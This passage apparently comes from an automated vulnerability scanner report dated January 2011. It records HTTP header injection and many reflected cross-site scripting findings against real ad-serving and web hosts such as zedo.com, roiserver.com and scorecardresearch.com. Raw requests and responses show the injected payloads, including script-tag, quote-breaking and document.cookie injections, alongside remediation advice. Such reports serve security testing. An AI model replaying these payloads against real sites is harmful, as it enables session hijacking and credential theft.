Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:54 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=533
Expires: Wed, 19 Jan 2011 18:09:47 GMT
Date: Wed, 19 Jan 2011 18:00:54 GMT
Connection: close
Content-Length: 2018
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',99487 1735 ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload fab80%0d%0a7b239144ac4 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /deals/socialads_reflectorfab80%0d%0a7b239144ac4 HTTP/1.1
Host: livingsocial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 19 Jan 2011 18:10:17 GMT
Content-Type: text/html
Content-Length: 178
Connection: close
Location: http://partners.livingsocial.com/deals/socialads_reflectorfab80
7b239144ac4
<html> <head><title>301 Moved Permanently</title></head> <body bgcolor="white"> <center><h1>301 Moved Permanently</h1></center> <hr><center>nginx</center> </body> </html>
4. Cross-site scripting (reflected)
There are 364 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
4.1. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ads.bluelithium.com
Path: /st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d6da"-alert(1)-"f1f4da902d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=1x1&section=1603038&9d6da"-alert(1)-"f1f4da902d6=1 HTTP/1.1 Host: ads.bluelithium.com Proxy-Connection: keep-alive Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1099 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:00:03 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Wed, 19 Jan 2011 18:00:03 GMT Pragma: no-cache Content-Length: 4636 Age: 0 Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?9d6da"-alert(1)-"f1f4da902d6=1&Z=1x1&s=1603038&_salt=3571184072";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array ...[SNIP]...
The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 125f6%0aalert(1)//47c7f0d831b was submitted in the url parameter. This input was echoed as 125f6 alert(1)//47c7f0d831b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gadgets/ifr?synd=ads&url=http%3A%2F%2Fwww.ljmsite.com%2Fgoogle%2Fgadgetads%2Fkayak2%2F728x90.xml125f6%0aalert(1)//47c7f0d831b&lang=en&country=US&up_clickurl=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBgKsxYCU3TenUF8qcqwGUz9mFBJbloLoB8IzKjxDAjbcBsNsGEAEYASCq9oUYOABQm9vQugFgyYajh9SjgBCgAcSR-u4DsgENd3d3LmxvY2FsLmNvbboBCTcyOHg5MF9hc8gBCdoBemh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmY3NzPWJhbm5lciZwPWxvY20uc3AmcG9zPTQmdD00JnN6PTcyOHg5MCZvcmQ9MTI5NTQ1OTcyNjE3MyZrPWxhdytvZmZpY2VzJmw9RGFsbGFzJTJDK1RY4AECuAIYyALmpc8XqAMB0QP5cQX6xDmFDPUDAAAAxMgEAQ%26num%3D1%26ggladgrp%3D10345345168030795840%26gglcreat%3D9988352204398423926%26sig%3DAGiWqtx_MMUhrwT9GMn6hHLnk8PZwdyM9g%26client%3Dca-pub-4103679352234073%26adurl%3D&up_aiturl=http://googleads.g.doubleclick.net/pagead/conversion/%3Fai%3DBgKsxYCU3TenUF8qcqwGUz9mFBJbloLoB8IzKjxDAjbcBsNsGEAEYASCq9oUYOABQm9vQugFgyYajh9SjgBCgAcSR-u4DsgENd3d3LmxvY2FsLmNvbboBCTcyOHg5MF9hc8gBCdoBemh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmY3NzPWJhbm5lciZwPWxvY20uc3AmcG9zPTQmdD00JnN6PTcyOHg5MCZvcmQ9MTI5NTQ1OTcyNjE3MyZrPWxhdytvZmZpY2VzJmw9RGFsbGFzJTJDK1RY4AECuAIYyALmpc8XqAMB0QP5cQX6xDmFDPUDAAAAxMgEAQ%26sigh%3Dc3WzeS_619k%26label%3D_AITNAME_%26value%3D_AITVALUE_&up_ads_clicktarget_new_=1&up_rawquery=las%20vegas%20hotel%20promotions&up_city=Washington&up_region=US-DC&up_lat=38.90&up_long=-77.04\ HTTP/1.1 Host: ads.gmodules.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 400 Bad Request P3P: CP="CAO PSA OUR" Content-Type: text/html; charset=UTF-8 Date: Wed, 19 Jan 2011 18:05:28 GMT Expires: Wed, 19 Jan 2011 18:05:28 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Connection: close
Unable to retrieve spec for http://www.ljmsite.com/google/gadgetads/kayak2/728x90.xml125f6 alert(1)//47c7f0d831b. HTTP error 400
The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 842ab'%3balert(1)//40a370322b1 was submitted in the h parameter. This input was echoed as 842ab';alert(1)//40a370322b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=2DFE311&w=300&h=250842ab'%3balert(1)//40a370322b1 HTTP/1.1 Host: ads.roiserver.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1295459726173&k=law+offices&l=Dallas%2c+TX Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 382 Date: Wed, 19 Jan 2011 17:59:36 GMT Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://ads.roiserver.com/disp?pid=2DFE311&rand=" + myRand;
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a473c"%3balert(1)//5cda4ab509d was submitted in the pid parameter. This input was echoed as a473c";alert(1)//5cda4ab509d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=2DFE311a473c"%3balert(1)//5cda4ab509d&w=300&h=250 HTTP/1.1 Host: ads.roiserver.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1295459726173&k=law+offices&l=Dallas%2c+TX Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 382 Date: Wed, 19 Jan 2011 17:59:28 GMT
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://ads.roiserver.com/disp?pid=2DFE311a473c";alert(1)//5cda4ab509d&rand=" + myRand;
The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b68a5'%3balert(1)//ef73ca3b12e was submitted in the w parameter. This input was echoed as b68a5';alert(1)//ef73ca3b12e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=2DFE311&w=300b68a5'%3balert(1)//ef73ca3b12e&h=250 HTTP/1.1 Host: ads.roiserver.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1295459726173&k=law+offices&l=Dallas%2c+TX Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 382 Date: Wed, 19 Jan 2011 17:59:32 GMT Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://ads.roiserver.com/disp?pid=2DFE311&rand=" + myRand;
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 56c1b<script>alert(1)</script>1d321066f7f was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=256c1b<script>alert(1)</script>1d321066f7f&c2=6035786&c3=6035786&c4=&c5=&c6=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Wed, 26 Jan 2011 17:59:23 GMT Date: Wed, 19 Jan 2011 17:59:23 GMT Connection: close Content-Length: 3587
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 33c9b<script>alert(1)</script>7d5427cace2 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=33c9b<script>alert(1)</script>7d5427cace2&tm=919330 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Wed, 26 Jan 2011 17:59:36 GMT Date: Wed, 19 Jan 2011 17:59:36 GMT Connection: close Content-Length: 3581
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 90558<script>alert(1)</script>0af258cd0b5 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=603578690558<script>alert(1)</script>0af258cd0b5&c3=6035786&c4=&c5=&c6=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Wed, 26 Jan 2011 17:59:24 GMT Date: Wed, 19 Jan 2011 17:59:24 GMT Connection: close Content-Length: 3587
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 26bb2<script>alert(1)</script>dadffb12f82 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=6035786&c3=603578626bb2<script>alert(1)</script>dadffb12f82&c4=&c5=&c6=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Wed, 26 Jan 2011 17:59:26 GMT Date: Wed, 19 Jan 2011 17:59:26 GMT Connection: close Content-Length: 3587
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload f09c8<script>alert(1)</script>b3efd23cef2 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=6035786&c3=6035786&c4=f09c8<script>alert(1)</script>b3efd23cef2&c5=&c6=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Wed, 26 Jan 2011 17:59:29 GMT Date: Wed, 19 Jan 2011 17:59:29 GMT Connection: close Content-Length: 3587
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 77439<script>alert(1)</script>58583c10800 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=77439<script>alert(1)</script>58583c10800&c6=&c15=&tm=919330 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Wed, 26 Jan 2011 17:59:32 GMT Date: Wed, 19 Jan 2011 17:59:32 GMT Connection: close Content-Length: 3581
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 147af<script>alert(1)</script>202194faed4 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=147af<script>alert(1)</script>202194faed4&c15=&tm=919330 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Wed, 26 Jan 2011 17:59:34 GMT Date: Wed, 19 Jan 2011 17:59:34 GMT Connection: close Content-Length: 3581
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload daf00'%3balert(1)//9a4146cf137 was submitted in the $ parameter. This input was echoed as daf00';alert(1)//9a4146cf137 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=daf00'%3balert(1)//9a4146cf137&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1099:daf00';alert(1)//9a4146cf137;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=524 Expires: Wed, 19 Jan 2011 18:09:46 GMT Date: Wed, 19 Jan 2011 18:01:02 GMT Connection: close Content-Length: 1990
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',daf00';alert(1)//9a4146cf137';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,daf00';alert(1)//9a4146cf137;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e01e"%3balert(1)//82425b7431e was submitted in the $ parameter. This input was echoed as 1e01e";alert(1)//82425b7431e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=1e01e"%3balert(1)//82425b7431e&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1099:1e01e";alert(1)//82425b7431e;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=524 Expires: Wed, 19 Jan 2011 18:09:46 GMT Date: Wed, 19 Jan 2011 18:01:02 GMT Connection: close Content-Length: 1990
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',1e01e";alert(1)//82425b7431e';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,1e01e";alert(1)//82425b7431e;z="+Math.random();}
4.15. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [name of an arbitrarily supplied request parameter]
